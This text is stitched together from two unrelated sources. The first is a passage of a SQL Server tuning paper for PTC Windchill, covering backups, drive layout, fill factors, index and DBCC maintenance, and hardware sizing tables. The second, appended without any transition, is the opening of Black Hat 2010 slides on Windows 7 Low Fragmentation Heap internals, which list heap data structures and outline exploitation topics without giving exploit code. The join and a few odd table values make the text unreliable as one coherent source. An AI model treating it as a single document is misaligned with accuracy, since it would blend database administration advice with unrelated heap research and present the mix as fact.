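    WITH DIFFERENTIAL, CHECKSUM, INIT;

-- Frequent transaction log backup (required by the Full recovery model):
BACKUP LOG wcAdmin TO DISK = N'E:\Backups\wcAdmin_log.trn'
    WITH CHECKSUM, INIT;
```

Consistent with the guidance above, the target disk must never be a drive that holds any Windchill database file.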
**Disk Drive Subsystems**

Table 7 shows the expected performance from a variety of disk drive options. Better performance typically comes with higher hardware costs and higher skill levels to correctly configure and maintain the system.

**Table 7 - Ranked Performance of Different Disk Drive Subsystems**

<table>
<thead>
<tr>
<th>File Type</th>
<th>DRAM SSD</th>
<th>SAN</th>
<th>RAID 0</th>
<th>RAID 1+0</th>
<th>RAID 5</th>
</tr>
</thead>
<tbody>
<tr>
<td>Tempdb</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>No</td>
</tr>
<tr>
<td>Tempdb Log</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>No</td>
</tr>
<tr>
<td>Transaction Log</td>
<td>No</td>
<td>1</td>
<td>No</td>
<td>2</td>
<td>3</td>
</tr>
<tr>
<td>Database</td>
<td>No</td>
<td>1</td>
<td>No</td>
<td>2</td>
<td>3</td>
</tr>
</tbody>
</table>

Here is a reminder of PTC’s recommendations for drives containing data files:

- The logical drives should be RAID 1, RAID 1+0, or RAID 5.
- Use SCSI hard drives, not SATA physical drives.
- Use more, smaller physical drives rather than fewer large drives.
- RAID should be hardware based, not software based.
- The physical drives should have the fastest speed and highest throughput that you can afford. Remember to test the throughput in situ.
- Data files should not be located on the drive where the OS resides.
- The Windows swap file should not be located on any of these drives, nor on the OS drive.
- The transaction log files should be on a different logical drive or LUN than any database files.
- When using multiple disks in a filegroup, make sure that all of the files are the same size and the physical drive speeds are the same.
- Verify that the disk partitions are aligned properly.

**Windchill Logical Files**

The default installation of Windchill creates five (5) logical files, as Table 8 shows. PTC’s SQL Server Configuration Utility (SCU) determines the initial size of the database files. SCU allows you to create either a medium-size or large database.
Each logical database file is assigned to a separate filegroup, as follows:

- WcAdmin → PRIMARY filegroup
- WcAdmin_blobs → BLOBS filegroup
- WcAdmin_index → INDX filegroup
- WcAdmin_wcaudit → WCAUDIT filegroup

In addition, you have the Windchill transaction log (WcAdmin_log) file. For best performance, at least eight (8) logical drives should be available. These logical drives should be independent; that is, not co-located on the same physical drive.

²⁰ Mirroring is required for high availability systems so that a single physical drive failure does not stop SQL Server.

### Table 8 - Windchill Logical Files

<table>
<thead>
<tr>
<th>Logical Name</th>
<th>Initial Size</th>
<th>Activity Type</th>
<th>Volume</th>
<th>Primary Activity</th>
</tr>
</thead>
<tbody>
<tr>
<td>WcAdmin</td>
<td>1GB</td>
<td>Random</td>
<td>High</td>
<td>R/W</td>
</tr>
<tr>
<td>WcAdmin_blobs</td>
<td>1GB</td>
<td>Random</td>
<td>Low</td>
<td>R/low W</td>
</tr>
<tr>
<td>WcAdmin_index</td>
<td>1GB</td>
<td>Random</td>
<td>Medium</td>
<td>R/W</td>
</tr>
<tr>
<td>WcAdmin_wcaudit</td>
<td>240MB</td>
<td>Sequential</td>
<td>Low</td>
<td>W</td>
</tr>
<tr>
<td>WcAdmin_log</td>
<td>1GB</td>
<td>Sequential</td>
<td>Low</td>
<td>W</td>
</tr>
</tbody>
</table>

Using a tool such as Microsoft’s [SQLIO](https://www.microsoft.com), evaluate each logical drive to determine the actual performance for sequential and random access. The allocation of drives should follow this heuristic pattern:

- Because transactions cannot happen faster than they can be logged, the lowest-latency, highest sequential-write drive(s) should be assigned to the `tempdb log`, with preference being given to the highest throughput metrics.
- The lowest-latency remaining drive(s) for random read and write should be assigned to `tempdb`, with preference being given to the highest throughput metrics.
- The lowest-latency remaining sequential-write drive(s) should be assigned to the transaction log (WcAdmin_log), with preference being given to the highest throughput metrics.
- The lowest-latency remaining drive for sequential write should be assigned to WcAdmin_wcaudit, with preference being given to the highest throughput metrics; audit trails are similar to logs in behavior.
- The lowest-latency remaining drive(s) for random read and write should be assigned to WcAdmin_index, with preference being given to the highest throughput metrics.
- The lowest-latency remaining drive(s) for random read and write should be assigned to WcAdmin, with preference being given to the highest throughput metrics.
- The remaining drive(s) should be assigned to WcAdmin_blobs, with preference being given to the highest throughput metrics.
- Backups should be assigned to whatever is left over (or to network locations).

After installing Windchill on SQL Server, you should adjust the autogrowth properties to reflect your environment. PTC recommends using the largest of the following:

- 10%, the baseline autogrowth recommendation given earlier in this paper.
- Determine the size of the largest document in MB that you expect to store, and multiply that value by 100. Increase WcAdmin_blobs autogrowth to either this value (in MB) or to the percentage of the initial size that equals this value. (Never decrease the autogrowth factor.)
- When Windchill is in operation, record the weekly size of each database file and then set autogrowth to twice the average weekly increase. This strategy results in autogrowth happening only about twice a month. The file sizes may be obtained by executing the following query:

```sql
SELECT Name, (Size * 8)/1024 AS MB FROM sys.database_files
```

The “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server” paper provides detailed analysis for configuring logical drives. Table 9 shows a recommended logical drive configuration.
Table 9 - Example of Logical Drive Assignments

<table>
<thead>
<tr>
<th>Drive #</th>
<th>Contents</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Tempdb (database)</td>
</tr>
<tr>
<td>2</td>
<td>Tempdb Log (database log)</td>
</tr>
<tr>
<td>3</td>
<td>wcAdmin Log (database log)</td>
</tr>
<tr>
<td>4</td>
<td>INDX (filegroup)</td>
</tr>
<tr>
<td>5</td>
<td>PRIMARY (filegroup)</td>
</tr>
<tr>
<td>6</td>
<td>BLOBS (filegroup)</td>
</tr>
<tr>
<td>7</td>
<td>WCAUDIT (filegroup)</td>
</tr>
<tr>
<td>8</td>
<td>Backups (operating system)</td>
</tr>
</tbody>
</table>

**Index Tuning**

Tuning and maintenance of indexes can often result in dramatic performance improvements. Indexes fragment from constant inserts, updates, and deletes. Thus, PTC recommends:

- Scheduling weekly rebuilds of all indexes.
- With SQL Server Enterprise Edition, you can rebuild online.
- Only rebuild immediately before a full database backup and after the last transaction log backup. This will reduce the size of your backups.

**What Is a Fill Factor?**

A fill factor determines how much free space is left in each index page for new entries. When a page runs out of space, it splits into two pages that are each about 50% full. This process continues indefinitely. The new pages are not physically in sequence (as the original index was), so the disk drive may have to skip back and forth: seek to the split page located somewhere else on the drive, and then return to the old location to read the next page. This random (instead of the ideal sequential) reading of the index can slow performance considerably.

If you look at a contemporary 15000-RPM SCSI drive specification, you will see 0.3 milliseconds for a single-track seek, 4.5 milliseconds for average seek time, and 11 milliseconds for maximum seek time. If 5% of the index pages are split pages, the time to read the index will double and performance will drop by 50%.
In general, with a new database, a low fill factor (50%) is best because of the high percentage of new records that will occur each day. As the database populates, you should raise the fill factor because the percentage of new records declines dramatically. Figure 4 shows how the percentage of growth decreases over time with the same number of records added weekly.

**Figure 4 - Rate of Growth Over Time with Constant Rate of New Records**

If you keep track of the percentage growth of each table between every regular rebuild, you can use Microsoft Excel to compute fill factors on a table-by-table basis, as Table 10 shows. This computed fill factor should result in less than 2% of index pages splitting in a week.

**Table 10 - Calculating Fill Factor from Historical Data**

<table>
<thead>
<tr>
<th>Week</th>
<th>Growth</th>
<th>Formula</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>5.7</td>
<td></td>
</tr>
<tr>
<td>2</td>
<td>6.3</td>
<td></td>
</tr>
<tr>
<td>3</td>
<td>4.5</td>
<td></td>
</tr>
<tr>
<td>4</td>
<td>5.9</td>
<td></td>
</tr>
<tr>
<td>5</td>
<td>5.4</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>4.8</td>
<td></td>
</tr>
<tr>
<td>7</td>
<td>6.8</td>
<td></td>
</tr>
<tr>
<td>Average</td>
<td>5.628571</td>
<td>=Average( )</td>
</tr>
<tr>
<td>Std Dev</td>
<td>0.807701</td>
<td>=StdDev( )</td>
</tr>
<tr>
<td>Fill Factor</td>
<td>91.94833</td>
<td>=100 - Average( ) - 3 * StdDev( )</td>
</tr>
</tbody>
</table>

**Evaluating Index Fragmentation**

To obtain information about problem indexes in wcAdmin, you can use this T-SQL code:

```
SELECT Object_Name(object_id), index_type_desc,
       avg_fragmentation_in_percent, avg_fragment_size_in_pages
FROM sys.dm_db_index_physical_stats (DB_ID('wcAdmin'), NULL, NULL, NULL, NULL)
WHERE avg_fragmentation_in_percent > 0
  AND avg_fragment_size_in_pages > 1
  AND index_type_desc <> 'HEAP'
ORDER BY avg_fragmentation_in_percent DESC
```

An example of this query’s output is shown in Figure 5.
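Acting on that fragmentation output, an individual index can then be rebuilt with the fill factor computed from its historical growth. This is a sketch only: the table name `wt_doc` and index name `idx_wt_doc` are hypothetical placeholders, and 92 is the rounded fill factor from the worked example in Table 10:

```sql
-- Rebuild one fragmented index with the computed fill factor.
-- wt_doc / idx_wt_doc are placeholder names; 92 comes from the
-- historical-growth calculation shown above.
ALTER INDEX idx_wt_doc ON wt_doc
REBUILD WITH (FILLFACTOR = 92, SORT_IN_TEMPDB = ON);
```

SORT_IN_TEMPDB = ON matches the earlier recommendation to enable that option, and shifts the rebuild's sort work onto the tempdb drives sized in the first part of this paper.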
Performance starts deteriorating at 5%\(^{21}\), and degradation can become very significant at 20%. The numbers reported for the heap index type are meaningless and should be ignored.

With weekly rebuilds and a weekly growth rate of around 2%, using a fill factor from Table 11 will allow appropriate growth with little fragmentation before the next rebuild. If the period between rebuilds is longer, then the fill factor should be lower to allow more growth without fragmentation.

Always do a rebuild in the period *between* the last transaction log backup and a full database backup to avoid backing up the log created from rebuilding the index (which can become very large).

**Table 11 - Fill Factors by Index Key Size for 2% Growth**

<table>
<thead>
<tr>
<th>Index Key Size</th>
<th>Fill Factor</th>
</tr>
</thead>
<tbody>
<tr>
<td>474</td>
<td>88%</td>
</tr>
<tr>
<td>447</td>
<td>89%</td>
</tr>
<tr>
<td>251</td>
<td>91%</td>
</tr>
<tr>
<td>161</td>
<td>92%</td>
</tr>
<tr>
<td>149</td>
<td>93%</td>
</tr>
<tr>
<td>103</td>
<td>94%</td>
</tr>
<tr>
<td>88</td>
<td>95%</td>
</tr>
<tr>
<td>44</td>
<td>96%</td>
</tr>
</tbody>
</table>

If rebuilding does not produce a significant drop in fragmentation, some possible causes are:

- The index is less than 1000 pages
- Lack of contiguous pages

**Types of Indexes**

SQL Server provides several types of indexes.

- **Heap**: A heap occurs on a table *without* a clustered index. Records are located via a triplet {FileId:PageNum:SlotNum}, with records written wherever space is available. You will rarely see a heap in commercial systems.
- **Clustered index**: With a clustered index, the records are ordered physically on disk by the index key, giving the table an explicit order.
  - The next record is often physically located next to the current record, so there is no need to do disk seeks to find it, resulting in excellent retrieval performance.
  - Only one clustered index may exist per table.
- **Non-clustered index**: With a non-clustered index, the index refers to the clustered index, similar to how an index of a book refers to the page where a term appears.

**Missing Indexes**

Selecting indexes is an art that must balance the cost of index maintenance against the performance gained by having an index. PTC has built indexes based on anticipated usage, but actual usage is often different. Frequently seeing full table scans is an indicator of a missing index. The following query returns the queries with the longest execution time and most frequent execution, which can help you identify where adding an index might be useful:

```sql
SELECT TOP 100 *
FROM (SELECT OBJECT_NAME(s2.objectid) AS ObjectName,
             DB_NAME(s2.dbid) AS DatabaseName,
             execution_count,
             total_worker_time,
             total_worker_time / execution_count AS Average_WorkerTime,
             SUBSTRING(s2.text, statement_start_offset / 2 + 1,
                 ((CASE WHEN statement_end_offset = -1
                        THEN LEN(CONVERT(nvarchar(max), s2.text)) * 2
                        ELSE statement_end_offset
                   END) - statement_start_offset) / 2 + 1) AS sql_statement,
             plan_generation_num, last_execution_time,
             last_worker_time, min_worker_time,
             total_physical_reads, last_physical_reads,
             min_physical_reads, max_physical_reads,
             total_logical_writes, last_logical_writes,
             min_logical_writes, max_logical_writes
      FROM sys.dm_exec_query_stats AS s1
      CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS s2) AS QueryStats
WHERE DatabaseName = 'wcAdmin'
  AND ObjectName IS NOT NULL
  AND sql_statement NOT LIKE '%@%'
  AND sql_statement NOT LIKE '%#%'
ORDER BY Average_WorkerTime DESC, execution_count DESC
```

**Tools to Help Maintain SQL Server Performance**

PTC recommends the installation and use of the following free Microsoft and community products to help maintain the performance of your Windchill system:

- SQL Server 2005 Best Practices Analyzer
- SQL Server 2005 Performance Dashboard
- SQL Server Health and History (SQLH2) Tool
- Performance Analysis of Logs (PAL) tool

For information about using these
tools, see the Microsoft and PTC Alliance Web page for “Best Maintenance Tools for PTC Windchill on Microsoft SQL Server 2005,” which walks you through building additional indexes to increase performance.

**Capacity Planning and Monitoring**

Database systems are not “install and forget” systems, because databases constantly grow. A new customer may result in rapid growth of Windchill, for example. Thus, it is essential to do capacity planning and monitoring of your Windchill system. Begin by recording the following items, available via the Performance Monitor SQL Server: Databases object, into Excel, daily at first and then weekly:

- Data File Size
- Percentage Log Used

These numbers will allow you to track growth trends and ensure that adequate disk space is always available.

**Common DBCC Commands**

SQL Server has a useful set of Database Console Commands (DBCC) that provide access to low-level information about the database for remediation of low-level issues. DBCC commands can cause blocking problems, so run them when there is the least load on the database. Some of the most useful commands are:

- **DBCC CHECKDB**
  - Checks database integrity and displays advice on how to fix found problems
  - If running this command affects user performance, trace flag 2528 should be set: `DBCC TRACEON (2528, -1)`
- **DBCC CHECKCONSTRAINTS**
  - Checks table constraints; not done by CHECKDB
- **DBCC SQLPERF(LOGSPACE)**
  - Lists the states of the logs
- **DBCC SHRINKDATABASE('wcAdmin', NOTRUNCATE)**
  - Moves the data to the front of the file
  - You rarely need to run this, but if you do run it, rebuild indexes immediately afterward
- **DBCC OPENTRAN**
  - Checks if there are any open transactions; an open transaction can interfere with the normal operation of the transaction log
- **DBCC USEROPTIONS**
  - Lists the options in effect; occasionally, gremlins may change the values you have set, resulting in a variety of problems. The expected values are shown in Figure 6.
For more information, see “DBCC Commands” or “DBCC (Transact-SQL)” in SQL Server Books Online.

**Figure 6 - Reviewing DBCC USEROPTIONS**

<table>
<thead>
<tr>
<th>Set Option</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>textsize</td>
<td>2147483647</td>
</tr>
<tr>
<td>language</td>
<td>us_english</td>
</tr>
<tr>
<td>dateformat</td>
<td>mdy</td>
</tr>
<tr>
<td>datefirst</td>
<td>7</td>
</tr>
<tr>
<td>lock_timeout</td>
<td>-1</td>
</tr>
<tr>
<td>quoted_identifier</td>
<td>SET</td>
</tr>
<tr>
<td>arithabort</td>
<td>SET</td>
</tr>
<tr>
<td>ansi_null_dflt_on</td>
<td>SET</td>
</tr>
<tr>
<td>ansi_warnings</td>
<td>SET</td>
</tr>
<tr>
<td>ansi_padding</td>
<td>SET</td>
</tr>
<tr>
<td>ansi_nulls</td>
<td>SET</td>
</tr>
<tr>
<td>concat_null_yields_null</td>
<td>SET</td>
</tr>
<tr>
<td>isolation level</td>
<td>read committed snapshot</td>
</tr>
</tbody>
</table>

**Common Mistakes**

Some SQL Server activities that sound logical do not do what you expect and can cause problems. Here are some general database misconceptions:

- **Do not shrink the database** - Although it sounds like something you should do, do not shrink the database. This action will often result in index fragmentation and worse performance, as well as SQL Server having to reinitialize the file space when it grows.
- **Performing UPDATE STATISTICS after rebuilding indexes** - This operation automatically occurs as part of the rebuilding process.
- **Rebuilding indexes immediately after doing a full backup** - Rebuilding indexes should occur immediately before doing a full backup so that the rebuilding log is never part of a transaction log backup.
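The correct ordering from the last point above can be sketched as a single maintenance script. The database name is Windchill's default; the table name `wt_doc` and the backup path are illustrative assumptions:

```sql
-- 1. Rebuild indexes (repeat per table) BEFORE the full backup,
--    so the rebuild activity never lands in a transaction log backup:
ALTER INDEX ALL ON wt_doc REBUILD;

-- 2. Only then take the full database backup:
BACKUP DATABASE wcAdmin TO DISK = N'E:\Backups\wcAdmin_full.bak'
    WITH CHECKSUM, INIT;
```

Run in this order, the large log generated by the rebuild is captured only by the full backup, keeping the subsequent transaction log backups small.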
**Conclusion**

The following points sum up the best practices described in this paper:

- **Sizing and configuring the hardware:**
  - Use adequate cores
  - Ensure adequate memory
  - Use appropriate physical drives and controllers
  - Make sure write caching is turned off
  - Ensure data redundancy of logical drives
  - Use sufficient logical drives to avoid contention issues
  - Perform appropriate assignment and sizing of filegroups to logical drives
- **Maintaining the database:**
  - Perform at least weekly full backups
  - Reorganize or rebuild indexes weekly
  - Use the optimal fill factor for the index key length
  - Add missing indexes that will improve performance
  - Verify that default settings have not been changed
- **Monitoring performance:**
  - Use tools to speed regular reviews
  - Track database and log growth

Further details on drive configuration and maintenance tasks and tools are available in the MSDN blog about PTC Windchill on SQL Server, as well as in two companion white papers available on the Microsoft and PTC Alliance Web page:

- Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server
- Best Maintenance Tools for PTC Windchill on Microsoft SQL Server 2005

**Links for Further Information**

PTC Windchill:

- Microsoft SQL Server: Improved Performance for PTC Windchill
- Windchill and Pro/INTRALINK 9.0 and 9.1 Server Hardware Sizing Guidelines - Microsoft Windows Platform

SQL Server information can be found in Books Online:

- SQL Server 2008 Books Online
- SQL Server 2005 Books Online

SQL Server Books Online also includes best practice information in the following articles:

- Best Practices for Replication Administration
- Replication Security Best Practices
- Best Practices for Recovering a Database to a Specific Recovery Point

See the SQL Server Best Practices portal for technical white papers, the SQL Server Best Practices Toolbox, Top 10 Lists, and other resources.
Following is a list of technical white papers that were tested and validated by the SQL Server development team. These can help you learn more about specific SQL Server topics.

- A Quick Look at Serial ATA (SATA) Disk Performance
- Best practices for operational excellence
- Best Practices for Running SQL Server on Computers That Have More Than 64 CPUs
- Best Practices for Semantic Data Modeling for Performance and Scalability
- Checklist: SQL Server Performance
- Checksum Problems, Choosing the Correct Recovery Model and More
- Comparing Tables Organized with Clustered Indexes versus Heaps
- Database Mirroring and Log Shipping Working Together
- Database Mirroring Best Practices and Performance Considerations
- Database Mirroring in SQL Server 2005
- Database Snapshot Performance Considerations Under I/O-Intensive Workloads
- DBCC SHOWCONTIG Improvements and Comparison between SQL Server 2000 and SQL Server 2005
- Description of using disk drive caches with SQL Server that every database administrator should know
- Disk Partition Alignment Best Practices for SQL Server
- FLASH Disk Opportunity for Server-Applications
- How to mirror the system and boot partition (RAID1) in Windows Server 2003
- How to use the SQLIOSim utility to simulate SQL Server activity on a disk subsystem
- How To: Use SQL Profiler
- Identifying and Resolving MDX Query Performance Bottlenecks in SQL Server 2005 Analysis Services
- Implementing Application Failover with Database Mirroring
- Improving SQL Server Performance
- Microsoft SQL Server 2005 Tuning Tips for PeopleSoft 8.x
- Microsoft SQL Server Database Engine Input/Output Requirements
- Microsoft SQL Server I/O Basics (2005)
- Microsoft SQL Server I/O subsystem requirements for the tempdb database
- Monitor and troubleshoot storage performance
- Partial Database Availability
- Performance of WD 250GB SATA Drives + 3ware Controller
- Physical Database Storage Design
- Precision Considerations for Analysis Services Users
- Pre-Configuration Database Optimizations
- Pre-Deployment I/O Best Practices
- RML Utilities for SQL Server (x64)
- SQL Server 2005 Deployment Guidance for Web Hosting Environments
- SQL Server 2005 Performance Dashboard Reports
- SQL Server 2005 Security Best Practices - Operational and Administrative Tasks
- SQL Server 2005 Waits and Queues
- SQL Server 7.0, SQL Server 2000, and SQL Server 2005 logging and data storage algorithms extend data reliability
- SQL Server Best Practices
- SQL Server Best Practices Article
- SQL Server Health and History Tool (SQLH2)
- SQL Server Replication: Providing High Availability Using Database Mirroring
- SQLIO Disk Subsystem Benchmark Tool
- Storage Top 10 Best Practices
- Support WebCast: How to Effectively Use SQL Server Profiler
- Technical Note #28: Common QA for deploying SQL Server ...
- TEMPDB Capacity Planning and Concurrency Considerations for Index Create and Rebuild
- Top Tips for Effective Database Maintenance
- Troubleshooting Performance Problems in SQL Server 2005
- Uncover Hidden Data to Optimize Application Performance
- Understanding Logging and Recovery in SQL Server
- Understanding SQL Server Backups

**Bibliography**

- SQL Server MVP Deep Dives (Manning, 2010), Paul Nielsen, Kalen Delaney, et al.
- Inside Microsoft SQL Server™ 2005: The Storage Engine (Microsoft Press, 2006), Kalen Delaney
- Professional SQL Server 2005 Administration (Wiley, 2006), Brian Knight, Ketan Patel, et al.
- SQL Server 2005 Bible (Wiley, 2006), Paul Nielsen

**Appendix: Hardware Sizing Guide for Windchill 9.1 and SQL Server 2005**

Following are guidelines for determining server requirements for both the application tier and the database tier on a Windows Server platform for a typical Windchill PDMLink, Windchill ProjectLink, or Pro/INTRALINK 9.0 or 9.1 installation that uses SQL Server 2005 as the database platform.
These guidelines build upon Table 2 in “Windchill and Pro/INTRALINK 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform.” Table A lists the required number of CPU cores (or sockets) and the amount of RAM for a database tier running Microsoft SQL Server 2005, based on the weighted number of active users. (See the PTC guidelines for the definition of active users.) In Table A, “core” refers to a single physical core, not to the number of dual-core or quad-core processors placed in the motherboard sockets. Windows Server 2008 licensing depends on the number of sockets, not the number of cores: Standard Edition, which is licensed for four sockets, will therefore cover only 4 cores if the CPUs are single core but 16 cores if the CPUs are quad core. Do not count hyper-threading logical processors as two (2) cores; common SQL Server practice is to disable hyper-threading, which offers a maximum theoretical benefit of only around 20% more throughput.
Table A - Database Server Sizing for Windchill 9.0 and 9.1 <table> <thead> <tr> <th>Weighted Number of Active Users</th> <th>Required Number of Cores</th> <th>Required Amount of RAM (GB)</th> <th>Windows Server 2008 Edition (Cores in Socket)(^{23})</th> <th>Windows Server 2003 Edition(^{24})</th> </tr> </thead> <tbody> <tr> <td>10</td> <td>1</td> <td>2</td> <td>Foundation</td> <td>Standard</td> </tr> <tr> <td>25</td> <td>1</td> <td>4</td> <td>Foundation</td> <td>Standard</td> </tr> <tr> <td>50</td> <td>2</td> <td>2/4</td> <td>Foundation (Dual)</td> <td>Standard</td> </tr> <tr> <td>100</td> <td>2</td> <td>8</td> <td>Foundation (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>200</td> <td>2</td> <td>8</td> <td>Foundation (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>300</td> <td>2</td> <td>8</td> <td>Foundation (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>400</td> <td>3</td> <td>8</td> <td>Foundation (Quad)</td> <td>Enterprise</td> </tr> <tr> <td>500</td> <td>3</td> <td>8</td> <td>Foundation (Quad)</td> <td>Enterprise</td> </tr> <tr> <td>600</td> <td>4</td> <td>12</td> <td>Standard</td> <td>Enterprise</td> </tr> <tr> <td>700</td> <td>4</td> <td>12</td> <td>Standard</td> <td>Enterprise</td> </tr> <tr> <td>800</td> <td>5</td> <td>12</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>900</td> <td>5</td> <td>12</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>1,000</td> <td>6</td> <td>16</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>1,200</td> <td>7</td> <td>16</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>1,500</td> <td>8</td> <td>16</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>2,000</td> <td>12</td> <td>20</td> <td>Standard (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>2,500</td> <td>14</td> <td>24</td> <td>Standard (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>3,000</td> <td>17</td> <td>32</td> <td>Enterprise (Dual)</td> <td>Datacenter</td> </tr> <tr> <td>3,500</td> <td>20</td> 
<td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>4,000</td> <td>23</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>4,500</td> <td>25</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>5,000</td> <td>28</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> </tbody> </table> * If the weighted number of active users falls between two values, round up. ### Table B - Number of Physical Files in the Tempdb Filegroup <table> <thead> <tr> <th>Weighted Number of Active Users</th> <th>Number of Tempdb Files</th> </tr> </thead> <tbody> <tr> <td>10</td> <td>1</td> </tr> <tr> <td>25</td> <td>1</td> </tr> <tr> <td>50</td> <td>2</td> </tr> <tr> <td>100</td> <td>2</td> </tr> <tr> <td>200</td> <td>2</td> </tr> <tr> <td>300</td> <td>2</td> </tr> <tr> <td>400</td> <td>3</td> </tr> <tr> <td>500</td> <td>3</td> </tr> <tr> <td>600</td> <td>4</td> </tr> <tr> <td>700</td> <td>4</td> </tr> <tr> <td>800</td> <td>5</td> </tr> <tr> <td>900</td> <td>5</td> </tr> <tr> <td>1,000</td> <td>6</td> </tr> <tr> <td>1,200</td> <td>7</td> </tr> <tr> <td>1,500</td> <td>8</td> </tr> <tr> <td>2,000</td> <td>12</td> </tr> <tr> <td>2,500</td> <td>14</td> </tr> <tr> <td>3,000</td> <td>17</td> </tr> <tr> <td>3,500</td> <td>20</td> </tr> <tr> <td>4,000</td> <td>23</td> </tr> <tr> <td>4,500</td> <td>25</td> </tr> <tr> <td>5,000</td> <td>28</td> </tr> </tbody> </table>
Understanding the Low Fragmentation Heap Chris Valasek, Researcher, X-Force Advanced R&D cvalasek@gmail.com / @nudehaberdasher Blackhat USA 2010 Introduction “What. Are. You……?” Introduction • Much has changed since Windows XP • Data structures have been added and altered • Memory management is now a bit more complex • New security measures are in place to prevent meta-data corruption • Heap determinism is worth more than it used to be • Meta-data corruption isn’t entirely dead The Beer List • Core data structures • _HEAP • _LFH_HEAP • _HEAP_LIST_LOOKUP • Architecture • FreeLists • Core Algorithms • Back-end allocation (RtlpAllocateHeap) • Front-end allocation (RtlpLowFragHeapAllocFromContext) • Back-end de-allocation (RtlpFreeHeap) • Front-end de-allocation (RtlpLowFragHeapFree) • Tactics • Heap determinism • LFH specific heap manipulation • Exploitation • Ben Hawkes #1 • FreeEntry Offset • Observations Prerequisites • All pseudo-code and data structures are taken from Windows 7 ntdll.dll version 6.1.7600.16385 (32-bit) • Yikes! 
I think there is a new one…

• Block/Blocks = 8 bytes
• Chunk = contiguous piece of memory, measured in blocks or bytes
• HeapBase = _HEAP pointer
• LFH = Low Fragmentation Heap
• BlocksIndex = _HEAP_LIST_LOOKUP structure
  • 1st BlocksIndex manages chunks from 8 to 1024 bytes
    • ListHint[0x7F] = Chunks >= 0x7F blocks
  • 2nd BlocksIndex manages chunks from 1024 bytes to 16k bytes
    • ListHint[0x77F] = Chunks >= 0x7FF blocks
• Bucket/HeapBucket = _HEAP_BUCKET structure used as a size/offset reference
• HeapBin/UserBlocks = Actual memory the LFH uses to fulfill requests

Core Data Structures

“Ntdll changed, surprisingly I didn’t quit”

### _HEAP (HeapBase)

<table> <thead> <tr> <th>Offset</th> <th>Field</th> <th>Type</th> </tr> </thead> <tbody> <tr> <td>+0x04c</td> <td>EncodeFlagMask</td> <td>Uint4B</td> </tr> <tr> <td>+0x050</td> <td>Encoding</td> <td>_HEAP_ENTRY</td> </tr> <tr> <td>+0x0b8</td> <td>BlocksIndex</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x0c4</td> <td>FreeLists</td> <td>_LIST_ENTRY</td> </tr> <tr> <td>+0x0d4</td> <td>FrontEndHeap</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x0da</td> <td>FrontEndHeapType</td> <td>UChar</td> </tr> </tbody> </table>

- **EncodeFlagMask** – A value that is used to determine if a heap chunk header is encoded. This value is initially set to 0x100000 by `RtlpCreateHeapEncoding()` in `RtlCreateHeap()`.
- **Encoding** – Used in an XOR operation to encode the chunk headers, preventing predictable meta-data corruption.
- **BlocksIndex** – This is a `_HEAP_LIST_LOOKUP` structure that is used for a variety of purposes. Due to its importance, it will be discussed in greater detail in the next slide.
- **FreeLists** – A special linked list that contains pointers to ALL of the free chunks for this heap. It can almost be thought of as a heap cache, but for chunks of every size (and no single associated bitmap).
- **FrontEndHeapType** – An integer initially set to 0x0 and subsequently assigned a value of 0x2, indicating the use of a LFH.
Note: Windows 7 does not actually have support for using Lookaside Lists.

- **FrontEndHeap** – A pointer to the associated front-end heap. This will either be NULL or a pointer to a _LFH_HEAP structure when running under Windows 7.

### _HEAP_LIST_LOOKUP (HeapBase->BlocksIndex)

<table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>0x000</td> <td>ExtendedLookup : Ptr32 _HEAP_LIST_LOOKUP</td> </tr> <tr> <td>0x004</td> <td>ArraySize : Uint4B</td> </tr> <tr> <td>0x010</td> <td>OutOfRangeItems : Uint4B</td> </tr> <tr> <td>0x014</td> <td>BaseIndex : Uint4B</td> </tr> <tr> <td>0x018</td> <td>ListHead : Ptr32 _LIST_ENTRY</td> </tr> <tr> <td>0x01c</td> <td>ListsInUseUlong : Ptr32 Uint4B</td> </tr> <tr> <td>0x020</td> <td>ListHints : Ptr32 Ptr32 _LIST_ENTRY</td> </tr> </tbody> </table>

- **ExtendedLookup** – A pointer to the next _HEAP_LIST_LOOKUP structure. The value is NULL if there is no ExtendedLookup.
- **ArraySize** – The highest block size that this structure will track; anything larger is tracked in a special ListHint. The only two sizes that Windows 7 currently uses are 0x80 and 0x800.
- **OutOfRangeItems** – This 4-byte value counts the number of items in the FreeList[0]-like structure. Each _HEAP_LIST_LOOKUP tracks free chunks larger than ArraySize-1 in ListHint[ArraySize-BaseIndex-1].
- **BaseIndex** – Used to find the relative offset into the ListHints array, since each _HEAP_LIST_LOOKUP is designated for a certain size. For example, the BaseIndex for the 1st BlocksIndex would be 0x0 because it manages lists for chunks from 0x0 – 0x80, while the 2nd BlocksIndex would have a BaseIndex of 0x80.
- **ListHead** – This points to the same location as HeapBase->FreeLists, which is a linked list of all the free chunks available to a heap.
- **ListsInUseUlong** – Formerly known as the FreeListInUseBitmap, this 4-byte integer is an optimization used to determine which ListHints have available chunks.
